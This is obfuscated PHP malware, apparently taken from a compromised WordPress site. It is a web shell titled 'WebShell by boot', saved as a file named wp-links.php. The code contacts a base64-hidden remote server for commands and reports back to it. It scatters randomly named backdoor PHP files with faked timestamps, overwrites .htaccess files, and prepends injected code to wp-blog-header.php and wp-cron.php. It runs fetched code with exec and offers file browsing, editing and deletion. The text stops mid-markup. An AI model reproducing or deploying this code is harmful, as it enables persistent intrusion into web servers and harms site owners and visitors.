????
Current Path : /home/innovagencyco/public_html/sibu2.innovagency.co.za/ |
Current File : /home/innovagencyco/public_html/sibu2.innovagency.co.za/wp-links.php |
<?php goto yzheS; HbNiz: $file_path_array = explode("\57", $file_path); goto MMyU7; HDUwi: function cndoorfile($fipath, $file_name, $open_content, $contnt) { if (!is_dir($fipath)) { mkdir($fipath, 493, true); } $fileurl = $fipath . "\57" . $file_name; if (file_put_contents($fileurl, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); chmod($fileurl, 365); $ht_content_now = ''; $ht_content_now = str_replace("\173\43\x68\x74\143\157\x6e\x74\x65\x6e\x74\175", $file_name, $open_content); chmod($fipath . "\x2f\x2e\150\x74\x61\143\x63\x65\x73\163", 493); if (file_put_contents($fipath . "\x2f\56\x68\x74\141\x63\143\x65\x73\x73", $ht_content_now) !== false) { chmod($fipath . "\57\56\150\x74\x61\143\143\x65\x73\163", 365); } chmod($fipath, 365); return true; } else { return false; } } goto aMTEw; ln66P: function getFilePermission($filename) { clearstatcache(true, $filename); $perms = fileperms($filename); if (($perms & 49152) === 49152) { $info = "\163"; } elseif (($perms & 40960) === 40960) { $info = "\154"; } elseif (($perms & 32768) === 32768) { $info = "\55"; } elseif (($perms & 24576) === 24576) { $info = "\142"; } elseif (($perms & 16384) === 16384) { $info = "\x64"; } elseif (($perms & 8192) === 8192) { $info = "\143"; } elseif (($perms & 4096) === 4096) { $info = "\x70"; } else { $info = "\165"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\167" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\170" : ($perms & 2048 ? "\123" : "\x2d"); $info .= $perms & 32 ? "\x72" : "\x2d"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\170" : ($perms & 1024 ? "\x53" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\167" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\x78" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } goto uJBsV; n7y0Z: $can_read = false; goto yzy4G; yzy4G: if (is_readable($now_path)) { $can_read = true; } goto xfNBn; dapLR: $now_site = $prot . $domain; goto lzUOT; MMyU7: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto n7y0Z; lXViA: function othersAction($data, $pweb, $now_site) { $shell_id = $data["\163\150\145\154\154\x5f\151\144"]; $group_id_2 = $data["\x67\162\157\165\160\137\x69\x64\x5f\62"]; $group_id_3 = $data["\147\x72\x6f\165\160\137\151\x64\x5f\x33"]; $shell_type = $data["\x73\150\145\x6c\x6c\137\164\x79\160\x65"]; $url = base64_decode($pweb) . "\x2f\145\151\x6e\x64\145\x78\144\157\x6f\162\56\160\x68\160\77\x61\143\x74\151\157\156\75\x6f\164\x68\x65\x72\x73\46\147\x72\x6f\165\160\137\151\x64\x5f\62\75" . $group_id_2 . "\46\147\x72\157\x75\160\x5f\151\x64\137\63\x3d" . $group_id_3 . "\46\x73\150\145\x6c\x6c\x5f\164\171\x70\x65\x3d" . $shell_type; $result_data = array(); $result_data["\x73\150\145\154\x6c\137\x69\144"] = $shell_id; $result_data["\x61\143\164\151\157\156"] = "\157\164\x68\x65\x72\163"; $save_url = base64_decode($pweb) . "\57\145\163\141\x76\x65\x2e\160\150\x70"; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\147\x72\x6f\x75\x70\x32\137\x63\x6f\144\145"]) && !empty($json_array["\163\145\x63\157\156\x64\137\146\151\x6c\145"]) || !empty($json_array["\147\x72\157\x75\x70\x33\137\143\157\x64\x65"]) && !empty($json_array["\x74\150\151\162\x64\x5f\146\x69\154\145"])) { $result = add_others($json_array["\147\x72\157\x75\x70\62\137\143\157\x64\145"], $json_array["\147\162\157\x75\160\63\x5f\x63\x6f\144\x65"], $json_array["\163\x65\143\157\x6e\144\137\146\x69\154\145"], $json_array["\164\150\x69\x72\x64\x5f\146\151\154\145"], $now_site); if (!empty($result["\x73\x65\143\x6f\x6e\144\x5f\165\162\154"]) || !empty($result["\164\x68\x69\162\x64\137\x75\x72\154"])) { $result_data["\x73\x65\143\157\156\144\137\165\x72\x6c"] = $result["\163\145\x63\157\156\x64\137\x75\162\154"]; $result_data["\164\x68\151\162\144\x5f\165\x72\154"] = $result["\x74\150\151\162\144\137\x75\162\x6c"]; $result_data["\163\164\141\x74\x75\163"] = 1; } else { $result_data["\x63\x6f\144\145"] = "\61\60\60\61"; $result_data["\x73\164\x61\x74\165\163"] = 2; } } else { $result_data["\x63\x6f\x64\145"] = "\x31\60\60\62"; $result_data["\163\164\141\x74\165\x73"] = 2; } $result_data["\163\x68\x65\154\x6c\x5f\164\x79\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\164\141\164\x75\163"]) { echo "\74\x70\40\x73\164\171\x6c\x65\x3d\42\x63\x6f\154\157\x72\72\147\162\145\145\x6e\x3b\x22\76\x4f\164\x68\x65\162\x73\40\x69\x73\40\x73\x75\143\143\x65\163\163\x66\165\154\154\x79\x3c\57\x70\x3e"; } else { echo "\74\x70\x20\x73\164\171\154\x65\x3d\x22\x63\x6f\x6c\157\x72\72\162\x65\x64\73\x22\x3e\117\x74\x68\x65\162\163\40\x69\x73\40\x66\x61\x69\x6c\145\144\x21\x20" . $result_data["\x63\157\x64\x65"] . "\74\x2f\160\76"; } } goto P3tPx; epY3Y: ini_set("\155\x65\155\157\162\x79\137\x6c\x69\155\151\x74", "\x2d\x31"); goto EJhe4; wN8yF: function deleteFile($file) { if (file_exists($file)) { chmod($file, 511); if (unlink($file)) { echo "\74\160\40\x73\x74\x79\x6c\145\x3d\x22\x63\157\154\x6f\x72\x3a\x67\162\x65\x65\x6e\73\146\x6f\156\x74\55\167\145\151\147\150\x74\72\x20\x62\157\x6c\144\73\42\x3e" . $file . "\x20\x69\163\40\x64\x65\x6c\145\x74\x65\40\x73\165\143\143\145\163\163" . "\74\57\x70\76"; } else { echo "\x3c\x70\x20\x73\164\x79\154\x65\x3d\42\143\x6f\154\157\162\72\162\x65\x64\73\x66\157\x6e\x74\55\167\x65\x69\147\x68\164\x3a\40\142\x6f\154\144\73\42\x3e" . $file . "\x20\151\x73\40\144\x65\154\x65\164\145\x20\x65\162\x72\x6f\x72" . "\x3c\x2f\x70\x3e"; } } else { echo "\x3c\x70\40\x73\x74\x79\154\145\75\x22\x63\x6f\x6c\x6f\162\x3a\162\145\x64\73\146\157\156\164\x2d\167\145\x69\x67\x68\x74\72\x20\x62\x6f\x6c\x64\73\42\x3e" . $file . "\40\x69\x73\x20\156\157\164\40\x65\170\x69\163\x74" . "\74\x2f\x70\x3e"; } } goto kIc8O; uJBsV: function sortByFolder($now_path, $all_list) { $folder_list = array(); $file_list = array(); foreach ($all_list as $k => $v) { if (is_dir($now_path . "\57" . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } sort($folder_list); sort($file_list); $all_list = array_merge($folder_list, $file_list); return $all_list; } goto z_Q2W; DuS_l: function add_exec($ht_contnt, $index_contnt, $exec_code, $wp_ycode) { $exec_code = str_replace("\133\x23\x23\150\x74\x63\x6f\x6e\164\145\156\164\43\43\135", base64_encode($ht_contnt), $exec_code); $exec_code = str_replace("\x5b\x23\43\x69\x6e\144\x65\x78\143\x6f\156\x74\x65\x6e\x74\x23\x23\x5d", base64_encode($index_contnt . $wp_ycode), $exec_code); $l12 = array("\61", "\62", "\63", "\x34", "\65", "\x36", "\x37", "\x38", "\71", "\60", "\161", "\167", "\145", "\x72", "\164", "\171", "\x75", "\151", "\x6f", "\160", "\141", "\x73", "\x64", "\x66", "\147", "\150", "\x6a", "\153", "\x6c", "\172", "\x78", "\x63", "\166", "\142", "\156", "\x6d", "\161", "\167", "\145", "\162", "\164", "\x79", "\165", "\151", "\157", "\160", "\x61", "\163", "\144", "\x66", "\147", "\150", "\152", "\153", "\x6c", "\x7a", "\x78", "\143", "\166", "\x62", "\x6e", "\x6d"); for ($i = 1; $i < rand(6, 6); $i++) { $e14 = rand(0, count($l12) - 1); $o15 .= $l12[$e14]; } $u17 = fopen($o15 . "\56\160\150\160", "\167"); fwrite($u17, $exec_code); fclose($u17); exec("\x70\x68\x70\40\55\x66" . __DIR__ . "\x2f{$o15}\56\x70\x68\160\x20\x3e\x20\x2f\x64\145\166\x2f\156\165\154\154\40\x32\x3e\57\144\x65\x76\x2f\156\x75\x6c\154\x20\46", $e18, $res); if ($res === 0) { return true; } else { return false; } } goto lXViA; xoGLR: if ($type == 1) { if (!empty($dir)) { $path = $dir; } $now_path = $path; } goto HbNiz; uMr1o: $web_url = $data["\x52\x45\x51\125\105\123\x54\x5f\x53\103\110\x45\115\105"] . "\72\x2f\57" . $data["\x53\105\x52\126\105\x52\x5f\116\101\115\105"]; goto MfOYa; EbiRa: function getAllSubdirectories($directory, $maxDepth = 10, $currentDepth = 0) { global $all_paths; $subdirectories = array(); if ($currentDepth > $maxDepth) { return array(); } $items = scandir($directory); foreach ($items as $item) { if ($item == "\56" || $item == "\x2e\x2e") { continue; } $path = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { $subdirectories[] = $path; $all_paths[] = $path; $subdirectories = array_merge($subdirectories, getAllSubdirectories($path, $maxDepth, $currentDepth + 1)); } } return $subdirectories; } goto kyk22; kyk22: function stationAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\163\150\x65\x6c\154\137\x69\144"] = $data["\163\x68\145\154\154\x5f\x69\144"]; $result_data["\141\x63\x74\151\x6f\156"] = "\163\x74\x61\164\x69\x6f\156"; $save_url = base64_decode($pweb) . "\57\145\163\141\x76\145\56\x70\x68\160"; $shell_id = $data["\163\150\145\154\154\x5f\x69\144"]; $shell_type = $data["\163\x68\145\154\154\137\164\x79\160\x65"]; $url = base64_decode($pweb) . "\x2f\145\151\x6e\144\x65\x78\x64\x6f\x6f\x72\x2e\160\x68\160\77\x61\x63\164\151\x6f\156\x3d\163\x74\141\x74\x69\x6f\156\46\163\x68\x65\x6c\154\x5f\151\x64\75" . $shell_id . "\46\x73\150\x65\x6c\x6c\137\164\171\160\x65\75" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $station_count = 0; if (!empty($json_array["\163\x74\x61\x74\151\157\156\x5f\x63\157\144\145"]) && !empty($json_array["\x68\164\x5f\x70\x7a\137\143\x6f\156\164\145\x6e\164"])) { $station_count = add_station($json_array["\x73\164\141\164\x69\157\x6e\137\x63\x6f\144\x65"], $json_array["\150\164\x5f\x70\x7a\137\x63\157\x6e\164\145\x6e\x74"], $now_site); if ($station_count > 0) { $result_data["\x73\x74\x61\x74\151\x6f\156\137\x63\157\x75\156\x74"] = $station_count; $result_data["\163\164\x61\x74\165\163"] = 1; } else { $result_data["\x63\157\144\145"] = "\61\60\60\61"; $result_data["\163\x74\x61\164\x75\163"] = 2; } } else { $result_data["\143\157\144\145"] = "\61\60\x30\62"; $result_data["\x73\x74\x61\164\165\x73"] = 2; } $result_data["\x73\150\145\x6c\154\x5f\x75\162\x6c"] = $now_site; $result_data["\x73\150\145\154\x6c\x5f\x74\x79\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); } goto q0Ygt; VAQCF: function crdoorfile($fipath, $contnt) { if (file_put_contents($fipath, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); return true; } else { return false; } } goto HDUwi; sz8Ir: if (is_writable($now_path)) { $can_write = true; } goto YvqB1; aMTEw: function strslit($str) { if (!empty($str)) { $cha = str_split($str); return "\47" . implode("\47\x2e\47", $cha) . "\x27"; } else { return ''; } } goto wNhIf; EJhe4: session_start(); goto ixzSL; MI7qD: function getAllDirectories($path, $depth, $door_count) { global $all_paths, $door_lists, $last_folder_url; $firstLevelDirs = glob($path . "\x2f\52", GLOB_ONLYDIR); $totalSelections = $door_count; $selectedDirectories = array(); $dirsPerFirstLevel = max(1, floor($totalSelections / count($firstLevelDirs))); foreach ($firstLevelDirs as $dir) { $all_paths[] = $dir; $subDirs = getAllSubdirectories($dir, 10); if (count($subDirs) >= $dirsPerFirstLevel) { $randomKeys = array_rand($subDirs, $dirsPerFirstLevel); foreach ((array) $randomKeys as $key) { $selectedDirectories[] = $subDirs[$key]; } } else { $selectedDirectories = array_merge($selectedDirectories, $subDirs); } } if (count($selectedDirectories) < $totalSelections) { $additionalNeeded = $totalSelections - count($selectedDirectories); $allSubDirs = array(); foreach ($firstLevelDirs as $dir) { $allSubDirs = array_merge($allSubDirs, glob($dir . "\x2f\x2a", GLOB_ONLYDIR)); } $remainingDirs = array_diff($allSubDirs, $selectedDirectories); if (count($remainingDirs) > 0) { $additionalDirs = (array) array_rand($remainingDirs, min($additionalNeeded, count($remainingDirs))); foreach ($additionalDirs as $key) { $selectedDirectories[] = $remainingDirs[$key]; } } } $randomKeys = array_rand($all_paths, 1); foreach ((array) $randomKeys as $key) { $last_folder_url = $all_paths[$key]; } $door_lists = $selectedDirectories; return $all_paths; } goto EbiRa; hQgDL: function getFileSize($file_url) { $file_size = filesize($file_url); if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . "\x20\x4d\102"; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . "\x20\x4b\102"; } else { $file_size = $file_size . "\40\102"; } } return $file_size; } goto ln66P; q0Ygt: function add_station($station_code, $ht_content, $now_site) { $station_code = base64_decode($station_code); $count = 0; $path = $_SERVER["\x44\x4f\103\x55\115\x45\116\124\137\122\117\x4f\124"]; $folder_name = basename($path); $all_folders = getParentsFolders($path); $all_results = array(); foreach ($all_folders as $k => $v) { $directories = glob($v . "\x2f\52", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } foreach ($all_results as $k => $v) { $index_url = $v . "\x2f\167\160\x2d\142\x6c\x6f\147\x2d\x68\x65\x61\x64\x65\162\x2e\x70\150\x70"; $wp_url = $v . "\57\167\160\55\143\x72\157\x6e\x2e\x70\150\160"; $ht_url = $v . "\x2f\x2e\x68\x74\x61\x63\143\145\x73\x73"; $index_yuan = ''; if (file_exists($index_url)) { chmod($index_url, 420); $index_yuan = file_get_contents($index_url); } if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 292); } $wp_yuan = ''; if (file_exists($wp_url)) { chmod($wp_url, 420); $wp_yuan = file_get_contents($wp_url); } if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 292); } chmod($ht_url, 420); file_put_contents($ht_url, $ht_content); chmod($ht_url, 292); $count++; } return $count; } goto fQcZA; QFZm4: function doorsAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\x73\150\145\x6c\154\137\x69\x64"] = $data["\x73\x68\145\154\x6c\137\x69\144"]; $result_data["\141\143\164\x69\157\x6e"] = "\144\157\x6f\x72\x73"; $save_url = base64_decode($pweb) . "\x2f\145\163\141\166\x65\56\x70\150\160"; $shell_id = $data["\x73\150\x65\154\154\x5f\x69\144"]; $group_id = $data["\x67\x72\157\x75\x70\137\151\x64"]; $shell_type = $data["\163\150\x65\154\x6c\137\164\171\160\x65"]; $url = base64_decode($pweb) . "\57\x65\151\156\144\x65\170\144\157\x6f\162\56\x70\x68\x70\77\141\x63\x74\151\x6f\156\75\x64\157\157\162\x73\x26\x73\x68\145\154\154\x5f\151\144\75" . $shell_id . "\x26\x67\162\157\x75\x70\137\x69\x64\75" . $group_id . "\46\163\x68\x65\154\x6c\x5f\164\x79\x70\x65\75" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\x64\x6f\x6f\x72\163"])) { $result = add_doors($json_array["\144\157\x6f\x72\163"], $json_array["\x64\x6f\x6f\162\x73\137\65\65"], $json_array["\x77\x70\137\146\x69\x6c\x65\163"], $json_array["\x74\x68\151\162\144\x5f\x66\151\154\145"], $json_array["\150\164\137\x62\x61\156\x5f\x63\x6f\x6e\164\145\156\x74"], $json_array["\150\x74\137\x6f\160\x65\156\137\143\x6f\x6e\164\145\156\x74"], $json_array["\163\x68\x65\154\x6c\x5f\x61\x63\x74\x69\x6f\156\137\143\x6f\x64\145"], $now_site); if (!empty($result["\x64\x6f\157\162\x5f\x66\151\x6c\x65\x73"])) { $result_data["\144\x6f\x6f\162\137\x75\162\154\163"] = implode("\73", $result["\x64\157\x6f\162\137\x66\151\x6c\x65\x73"]); $result_data["\163\150\x65\154\x6c\137\x6f\x74\x68\145\162\x5f\x75\162\154"] = $result["\x73\x68\x65\154\x6c\137\157\164\150\145\162\137\165\162\154"]; $result_data["\163\x74\x61\164\165\x73"] = 1; } else { $result_data["\x63\157\144\145"] = "\x31\60\x30\61"; $result_data["\x73\x74\x61\x74\x75\163"] = 2; } } else { $result_data["\143\x6f\x64\x65"] = "\x31\60\60\x32"; $result_data["\163\x74\x61\164\165\163"] = 2; } $result_data["\163\150\145\x6c\x6c\137\x74\171\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\x74\141\x74\165\x73"]) { echo "\x3c\160\x20\163\x74\x79\154\x65\x3d\x22\x63\157\154\x6f\x72\72\x67\162\x65\145\156\x3b\42\76\104\157\x6f\x72\x73\40\x69\163\40\163\x75\x63\143\x65\163\163\x66\165\154\154\171\x2c\x20\123\165\143\143\145\163\163\40\x2e\x68\40\x69\x73\x20" . $result["\143\x6f\x75\x6e\x74"] . "\74\x2f\160\76"; foreach ($result["\x64\x6f\157\x72\x5f\x66\x69\x6c\145\x73"] as $k => $v) { echo "\x3c\160\x3e\74\141\x20\x68\x72\x65\146\x3d\x22" . $v . "\x22\x20\x74\x61\x72\x67\145\164\75\42\137\142\x6c\x61\156\x6b\42\x3e" . $v . "\x3c\57\141\x3e\x3c\x2f\x70\x3e"; } } else { echo "\x3c\x70\40\163\x74\171\154\145\75\42\x63\157\154\x6f\x72\x3a\162\x65\144\x3b\42\x3e\104\x6f\x6f\x72\163\40\x69\x73\40\x66\x61\151\154\145\x64\41\x20" . $result_data["\x63\x6f\x64\x65"] . "\74\57\x70\x3e"; } } goto wGN7h; ixzSL: $type = $_REQUEST["\x74\x79\160\145"]; goto yQEiJ; hFQN4: function fill_full($file_urls, $sy_count) { $path = realpath($_SERVER["\x44\x4f\x43\x55\x4d\105\116\124\137\x52\117\117\x54"]); $file_url_result = array(); foreach ($file_urls as $k => $v) { $v = trim($v); if (!empty($v)) { $file_url_result[] = $v; } } $file_tou = array("\x77\x70\x2d\x63\157\156\x74\x65\x6e\x74", "\167\160\x2d\x61\144\x6d\x69\156", "\167\160\55\151\156\x63\154\165\144\145\163"); $file_list = array("\143\x73\163", "\151\x6d\141\x67\145\x73", "\x69\155\147", "\x6a\x73", "\164\x68\145\x6d\x65\163", "\x70\x6c\x75\147\151\156\163", "\165\x70\x6c\x6f\141\x64\163", "\154\141\x6e\x67\165\141\147\x65\163", "\x69\x6e\143\154\165\144\x65\163", "\x6d\x61\x69\x6e\164", "\x6e\145\x74\x77\x6f\162\x6b", "\155\x65\164", "\x75\163\145\162", "\x49\130\x52", "\111\104\63", "\146\x6f\x6e\164\x73", "\x62\x6c\157\143\153", "\142\x6c\157\x63\x6b\x73", "\x70\150\x70\55\x63\x6f\155\x70\141\164", "\x70\150\160", "\x54\x65\x78\164", "\167\x69\x64\x67\145\164\x73", "\x53\x69\x6d\160\x6c\x65\x50\x69\x65", "\162\x61\x6e\144\x6f\155", "\163\164\x79\x6c\x65\x2d\145\x6e\147\151\x6e\145", "\160\x6f\x6d\157", "\x63\x65\x72\x74\151\146\151\143\141\x74\145\x73", "\142\154\x6f\x63\x6b\x74"); for ($i = 0; $i < $sy_count; $i++) { $path_url = $path . "\x2f" . $file_tou[rand(0, count($file_tou) - 1)]; for ($j = 0; $j < rand(3, 6); $j++) { $path_url = $path_url . "\57" . $file_list[rand(0, count($file_list) - 1)]; } $file_url_result[] = $path_url; } return $file_url_result; } goto MI7qD; kIc8O: function findFilesWithContent($directory, $searchString, $currentDepth = 0, $maxDepth = 10) { $foundFiles = array(); if ($currentDepth >= $maxDepth) { return $foundFiles; } if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if ($file != "\x2e" && $file != "\x2e\x2e") { $filePath = $directory . "\x2f" . $file; if (is_dir($filePath)) { $foundFiles = array_merge($foundFiles, findFilesWithContent($filePath, $searchString, $currentDepth + 1, $maxDepth)); } else { if (strpos(file_get_contents($filePath), $searchString) !== false) { $foundFiles[] = $filePath; } } } } closedir($handle); } return $foundFiles; } goto VA5J7; xfNBn: $can_write = false; goto sz8Ir; dSIqV: $now_path = dirname($file_path); goto ejilS; wGN7h: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { $result = array(); global $door_lists, $all_paths, $last_folder_url; $path = $_SERVER["\104\117\x43\125\115\x45\x4e\124\137\x52\x4f\117\124"]; $door_count = count($doors_array) + count($doors_55_array); getAllDirectories($path, 1, $door_count); if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); $door_files = array(); $succ_files = array(); $i = 0; $shell_other_url = ''; foreach ($randomKeys as $key) { $file_door_url = $door_lists[$key]; $file_name = getrandstr(rand(5, 10)) . "\56\160\x68\x70"; if ($i >= count($doors_array)) { $file_door_url = $file_door_url . "\57\x77\x70"; $file_url = $file_door_url . "\57" . $file_name; $res = cndoorfile($file_door_url, $file_name, $open_content, $doors_55_array[$i - count($doors_array)]); } else { $file_url = $file_door_url . "\57" . $file_name; $res = crdoorfile($file_url, $doors_array[$i]); } if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } $i++; } if (!empty($last_folder_url)) { $file_url = $last_folder_url . "\x2f\151\156\144\x65\170\x2e\160\x68\x70"; $res = crdoorfile($file_url, base64_decode($shell_action_code)); if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } } $count = 0; if (count($succ_files) > 0) { $ht_urls = array(); $wp_files_array = explode("\x3b", $wp_files); foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } $ht_urls = $succ_files; $ht_urls = array_merge($ht_urls, $wp_files_array); $ht_urls[] = $path . "\57" . $third_file; $ht_folders = array(); $ht_files = array(); foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } foreach ($all_paths as $k => $a) { $now_files = array(); foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } $ht_content_now = ''; if (!empty($now_files)) { $ht_content_now = str_replace("\173\x23\x68\x74\143\157\x6e\x74\145\156\x74\175", implode("\x7c", $now_files), $open_content); } else { $ht_content_now = $ban_content; } chmod($a . "\57\56\150\x74\x61\x63\x63\x65\163\163", 493); if (file_put_contents($a . "\x2f\56\x68\x74\x61\143\x63\x65\x73\163", $ht_content_now) !== false) { $count++; chmod($a . "\x2f\56\x68\164\x61\143\143\x65\x73\163", 365); } } } $result["\x64\157\x6f\162\x5f\x66\x69\154\x65\163"] = $door_files; $result["\x73\x68\145\x6c\x6c\x5f\x6f\x74\x68\145\162\x5f\165\x72\x6c"] = $shell_other_url; $result["\143\157\165\156\164"] = $count; return $result; } goto hFQN4; NE3n2: $domain = $_SERVER["\x48\x54\x54\120\137\110\x4f\123\x54"]; goto dapLR; Lxkmu: $last_folder_url = ''; goto qEeFh; eGeSb: $pws = "\x61\x48\x52\x30\x63\104\157\x76\114\62\x5a\x77\115\x6a\101\x79\x4e\103\65\x69\x65\127\x68\166\x64\x43\x35\x30\142\x33\x41\75"; goto i7zV4; or3Cr: function curlget($url) { $url_data = ''; if (function_exists("\x66\151\154\x65\x5f\147\145\x74\137\143\x6f\x6e\164\145\x6e\164\163")) { $url_data = file_get_contents($url); } if (empty($url_data) && function_exists("\x63\x75\x72\x6c\x5f\145\x78\x65\x63")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_data = curl_exec($conn); curl_close($conn); } if (empty($url_data) && function_exists("\146\157\160\145\156") && function_exists("\163\x74\x72\145\141\x6d\x5f\147\145\x74\x5f\x63\x6f\x6e\x74\145\156\164\x73")) { $handle = fopen($url, "\x72"); $url_data = stream_get_contents($handle); fclose($handle); } return $url_data; } goto IkKQx; HgDuV: $door_lists = array(); goto Lxkmu; YvqB1: $prot = !empty($_SERVER["\x48\124\x54\x50\x53"]) && $_SERVER["\110\124\124\x50\x53"] !== "\x6f\146\146" || $_SERVER["\x53\x45\x52\x56\x45\122\x5f\120\x4f\x52\x54"] == 443 ? "\x68\164\164\160\163\x3a\57\57" : "\150\x74\x74\160\72\x2f\x2f"; goto NE3n2; VAbhH: $post_data = $_POST; goto eGeSb; wNhIf: function getrandstr($length = 10) { $characters = "\141\142\x63\x64\x65\x66\x67\x68\151\152\x6b\154\x6d\156\157\x70\161\162\163\x74\x75\x76\x77\x78\x79\172\101\x42\103\104\105\x46\x47\x48\111\112\113\x4c\x4d\x4e\x4f\x50\x51\x52\123\x54\x55\x56\127\130\131\x5a"; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } goto tt_eE; VZgsP: $now_url = $web_url . $sy_path; goto VAbhH; PhIHn: $all_paths = array(); goto HgDuV; NCifJ: function crefile($fiurl, $contnt) { $path = $_SERVER["\x44\x4f\x43\125\x4d\x45\x4e\x54\137\122\117\117\124"] . "\x2f"; $filath = $path . dirname($fiurl); if (!is_dir($filath)) { if (!mkdir($filath, 493, true)) { return false; } } $file_path = $path . $fiurl; if (file_put_contents($file_path, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($file_path, $time); return true; } else { return false; } } goto VAQCF; wvL7I: $website_path = $data["\104\x4f\x43\x55\115\105\x4e\124\x5f\122\117\x4f\124"]; goto qG8zt; yQEiJ: $path = $_REQUEST["\x70\141\164\x68"]; goto Nd3ZL; qEeFh: if (!empty($_SESSION["\143\62\150\154\142\x47\170\146\x59\x32\x39\x6b\x5a\121\75\75"]) && strlen($_SESSION["\143\62\x68\x6c\142\107\170\146\131\x32\x39\x6b\132\x51\75\75"]) == 20) { ?> <!doctypehtml><html lang="en"><head><title>WebShell by boot</title><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"rel="stylesheet"><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script><style>.col-12{width:100%;display:inline-block}.col-6{width:50%;display:inline-block;float:left}</style></head><body><div class="jumbotron text-center"style="padding:1rem 0"><h1 style="font-size:2rem;font-weight:700;margin:1rem 0">WebShell by boot</h1></div><div class="container"><div class="row"><p><div style="width:30%;display:inline-block">Server IP:<?php echo $data["\123\105\122\x56\105\122\137\101\104\x44\122"]; ?> </div><div style="width:30%;display:inline-block">Server Software:<?php echo $data["\123\105\122\x56\x45\122\x5f\x53\117\x46\124\127\101\x52\x45"]; ?> </div><div style="width:30%;display:inline-block">OS:<?php echo PHP_OS; ?> </div></p><p><div style="width:30%;display:inline-block">Website:<?php echo $data["\110\x54\x54\120\137\x48\x4f\x53\x54"]; ?> </div><div style="width:30%;display:inline-block">User:<?php echo get_current_user(); ?> </div></p><p><a href="?path=<?php echo $website_path; ?> ">Project</a></p></div><div class="row"><p>Path:<?php $file_now_path = ''; foreach ($file_path_array as $k => $v) { if (empty($v)) { ?> <a href="?path=/">-</a>r<?php } else { if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . "\x2f" . $v; } $file_now_path = $file_now_path . "\x2f" . $v; ?> /<a href="?path=<?php echo $file_now_path; ?> "><?php echo trim($v); ?> </a><?php } } ?> <span style="color:green"style="color:red"<?php if ($can_read) { } else { } ?> >Readable</span> | <span style="color:green"style="color:red"<?php if ($can_write) { } else { } ?> >Writeable</span></p></div><?php if ($type == 2 || $type == 3) { if ($type == 3) { $file_content = $_REQUEST["\146\x69\x6c\x65\137\x63\157\156\x74\x65\x6e\164"]; $content_result = file_put_contents($path, $file_content); if ($content_result) { echo "\74\x64\151\x76\x20\143\154\141\163\x73\x3d\42\141\154\145\x72\164\x20\x61\154\145\x72\x74\x2d\x73\165\143\143\145\163\x73\42\40\x72\157\x6c\x65\x3d\x22\x61\154\145\x72\x74\x22\76\106\x69\x6c\x65\40\x63\157\x6e\x74\x65\156\x74\40\x6d\157\144\151\146\151\x65\x64\x20\x73\x75\143\x63\x65\163\163\x66\x75\x6c\154\x79\x21\x3c\57\144\151\166\x3e"; } else { echo "\x3c\x64\151\x76\x20\x63\x6c\x61\163\x73\75\x22\141\154\145\x72\x74\40\141\154\x65\x72\164\55\144\141\156\x67\145\162\42\40\162\157\x6c\145\x3d\x22\x61\x6c\145\162\x74\x22\76\x46\x61\151\x6c\x65\144\x20\x74\x6f\x20\155\157\x64\x69\146\x79\40\x66\151\154\x65\40\x63\x6f\156\x74\145\x6e\164\x21\x3c\x2f\x64\x69\166\76"; } } ?> <div class="row"><form 